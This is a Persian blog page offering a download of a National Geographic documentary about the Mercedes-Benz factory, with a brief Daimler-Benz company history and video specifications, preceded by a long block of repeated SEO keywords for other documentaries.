Invasion,فيلم مستند,فيلم جديد,فيلم جديد براي دانلود,مستند خارجی,اموزش تصويري,اموزش تصويريفيلم,خارجی,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم مستند دانلود فیلم مستند زندانی های کاترینا BBC Prisoners Of Katrina DVDrip,دانلود فيلم با لينك مستقيم,دانلود فیلم مستند دانلود مستند,دانلود فیلم های خارجی,دانلود فیلم خارجی دانلود فیلم مستند زندانی های کاترینا BBC Prisoners Of Katrina DVDrip,دانلود فیلم دانلود فیلم مستند زندانی های کاترینا BBC Prisoners Of Katrina DVDrip,دانلود دانلود فیلم مستند زندانی های کاترینا BBC Prisoners Of Katrina DVDrip,فيلم مستند,فيلم جديد,فيلم جديد براي دانلود,مستند خارجی,اموزش تصويري,اموزش تصويريفيلم,خارجی,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم مستند دانلود فیلم مستند مومیایی ها رازهایی از فراعنه IMAX Mummies Secrets of the Pharaohs 1440p,دانلود فيلم با لينك مستقيم,دانلود فیلم مستند دانلود مستند,دانلود فیلم های خارجی,دانلود فیلم خارجی دانلود فیلم مستند مومیایی ها رازهایی از فراعنه IMAX Mummies Secrets of the Pharaohs 1440p,دانلود فیلم خارجی دانلود مستند,دانلود فیلم دانلود فیلم مستند مومیایی ها رازهایی از فراعنه IMAX Mummies Secrets of the Pharaohs 1440p,دانلود فیلم دانلود مستند,دانلود مستند,دانلود دانلود فیلم مستند مومیایی ها رازهایی از فراعنه IMAX Mummies Secrets of the Pharaohs 1440p,فيلم مستند,فيلم اموزشي,اموزش تصويري,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم اموزشي,دانلود مستقيم فيلم اموزشي,فيلم مستند,فيلم جديد,فيلم جديد براي دانلود,مستند خارجی,اموزش تصويري,اموزش تصويريفيلم,خارجی,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم مستند دانلود فیلم مستند موج بی نهایت تاهیتی IMAX The Ultimate Wave Tahiti 720p BluRay,دانلود فيلم با لينك مستقيم,دانلود فیلم مستند دانلود مستند,دانلود فیلم های خارجی,دانلود فیلم خارجی دانلود فیلم مستند موج بی نهایت تاهیتی IMAX The Ultimate Wave Tahiti 720p BluRay,دانلود فیلم خارجی دانلود مستند,دانلود فیلم دانلود فیلم مستند موج بی نهایت تاهیتی IMAX The Ultimate Wave Tahiti 720p BluRay,دانلود فیلم دانلود مستند,دانلود مستند,دانلود دانلود فیلم مستند موج بی نهایت تاهیتی IMAX The Ultimate Wave Tahiti 720p BluRay,فيلم مستند,فيلم جديد,فيلم جديد براي دانلود,مستند خارجی,اموزش تصويري,اموزش تصويريفيلم,خارجی,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم مستند دانلود فیلم مستند جزایر گالاپاگوس IMAX Galapagos 2011 BluRay 720p,دانلود فيلم با لينك مستقيم,دانلود فیلم مستند دانلود مستند,دانلود فیلم های خارجی,دانلود فیلم خارجی دانلود فیلم مستند جزایر گالاپاگوس IMAX Galapagos 2011 BluRay 720p,دانلود فیلم خارجی دانلود مستند,دانلود فیلم دانلود فیلم مستند جزایر گالاپاگوس IMAX Galapagos 2011 BluRay 720p,دانلود فیلم دانلود مستند,دانلود مستند,دانلود دانلود فیلم مستند جزایر گالاپاگوس IMAX Galapagos 2011 BluRay 720p,فيلم مستند,فيلم جديد,فيلم جديد براي دانلود,مستند خارجی,اموزش تصويري,اموزش تصويريفيلم,خارجی,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم مستند دانلود فیلم مستند شیر بد رفتار می کنند Lions Behaving Badly BluRay 720p,دانلود فيلم با لينك مستقيم,دانلود فیلم مستند دانلود مستند,دانلود فیلم های خارجی,دانلود فیلم خارجی دانلود فیلم مستند شیر بد رفتار می کنند Lions Behaving Badly BluRay 720p,دانلود فیلم خارجی دانلود مستند,دانلود فیلم دانلود فیلم مستند شیر بد رفتار می کنند Lions Behaving Badly BluRay 720p,دانلود فیلم دانلود مستند,دانلود مستند,دانلود دانلود فیلم مستند شیر بد رفتار می کنند Lions Behaving Badly BluRay 720p,فيلم مستند,فيلم جديد,فيلم جديد براي دانلود,مستند خارجی,اموزش تصويري,اموزش تصويريفيلم,خارجی,دانلود,دانلود فيلم,دانلود فيلم مستند,دانلود فيلم مستند اموزشي,دانلود فيلم مستند دانلود فیلم مستند پرتاب شاتل فضایی اس تی اس Space Shuttle STS 118 HD,دانلود فيلم با لينك مستقيم,دانلود فیلم مستند دانلود مستند,دانلود فیلم های خارجی,دانلود فیلم خارجی دانلود فیلم مستند پرتاب شاتل فضایی اس تی اس Space Shuttle STS 118 HD,دانلود فیلم خارجی دانلود مستند,دانلود فیلم دانلود فیلم مستند پرتاب شاتل فضایی اس تی اس Space Shuttle STS 118 HD,دانلود فیلم دانلود مستند,دانلود مستند,دانلود دانلود فیلم مستند پرتاب شاتل فضایی اس تی اس Space Shuttle STS 118 HD,, :: 6:35 بعد از ظهر
گری گوری

دانلود فیلم مستند کمپانی مرسدس NG Megafactories Mercedes 2011 BluRay and XviD

نوشته شده توسط حمیدرضا در تاریخ چهارشنبه، 25 خرداد ماه 1390
دانلود
فیلم مستند کمپانی مرسدس NG Megafactories Mercedes 2011 BluRay and XviD
مستند کمپانی مرسدس محصول شبکه National Geographic

این مستند جهت رفاه حال شما عزیزان با دو کیفیت BluRay 720p و XviD آماده دانلود شده است

امروز برای علاقه مندان به کمپانی های اتومبیل ، مستندی زیبا آماده کرده ایم.
در این مستند به کارخانه مرسدس بنز در آلمان سفر می کنیم  و ساخت یکی از بهترین اتومبیل های این کارخانه را مشاهده خواهیم کرد.Mercedes SLS که 571 اسب بخار قدرت دارد  یکی از شاهکارهای این کمپانی می باشد.در کمپانی کامپیوتر  های قوی ساختن اتومبیل ها را به طور دقیق انجام می دهند
مرسدس بنز، که در فارسی بیشتر به بنز معروف است، نام خودروهای ساخت شرکت دایملر است. این شرکت ادامه قدیمی‌ترین سازنده خودرو در جهان است. گوتلیب دایملر و کارل بنز، دو مخترع آلمانی موتور چهار زمانه، پس از مدتی کار مستقل، شرکت دایملر-بنز را در سال ۱۹۲۶ تأسیس کردند و محصولات خود را به پیشنهاد نخستین نماینده فروش خود، مرسدس گذاشتند که از نام دختر این نماینده گرفته شده بود.
در سال ۱۹۹۸ شرکت دایملر-بنز با پرداخت مبلغ ۳۶ میلیارد دلار اقدام به خرید شرکت آمریکایی کرایسلر نمود. با این خرید شرکت دایملر-کرایسلر تأسیس شد.پس از تاسیس شرکت جدید دایملرکرایسلر، تولید اتومبیل‌ها با نامهای تجاری قدیمی ادامه یافت. با اینکه در ابتدا استفادهٔ مشترک از فن‌آوری‌های دو شرکت بصورت محدود پیش‌بینی شده بود، اما ساخت خودروهای آمریکایی دوج مگنوم، دوج چارجر، کرایسلر ۳۰۰ و کرایسلر چلنجر مدل ۲۰۰۹ اصولا به خاطر استفاده از فن‌آوری دایملر امکان پذیر شد. طرف آمریکایی امکان استفاده از موتورهای دیزل دایملر را در خودروهای کرایسلر پیدا کرد.
در سال ۲۰۰۷ به دلیل کارکرد ضعیف کرایسلر، شرکت دایملر سهام کرایسلر را به یک موسسه مالی فروخت و به شراکت تجاری با کرایسلر پایان داد.شرکت دایملر کراسلر متعاقبا به شرکت دایملر آ گ تغییر نام داد.
کیفیت BluRay به شرح زیر می باشد:
Language: English 00:45:01 | 1280x720 | x264 - 3147Kbps | 25.000fps | MP2 - 256Kbps | 1.09GB
کیفیت XviD به شرح زیر می باشد:
Language: English 00:45:01 | 624x352 | XviD - 943Kbps | 25.000fps | MP3 - 128Kbps | 349MB

برای دیدن تصاویری از فیلم و دانلود به ادامه مطلب مراجعه نمایید
 

 



ادامه مطلب ...


صفحه قبل 1 صفحه بعد

درباره وبلاگ


به وبلاگ خودتان خوش آمدید امیدوارم که در این وبلاگ بتوانم نیاز شما دوست گرامی را برآورده سازم.
آخرین مطالب
آرشيو وبلاگ
نويسندگان
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان کافی نت و آدرس caffinet.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.








نام :
وب :
پیام :
2+2=:
(Refresh)

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 22
بازدید دیروز : 0
بازدید هفته : 114
بازدید ماه : 9146
بازدید کل : 139297
تعداد مطالب : 562
تعداد نظرات : 8
تعداد آنلاین : 1


Alternative content


آریان پیامک
آریان اس ام اس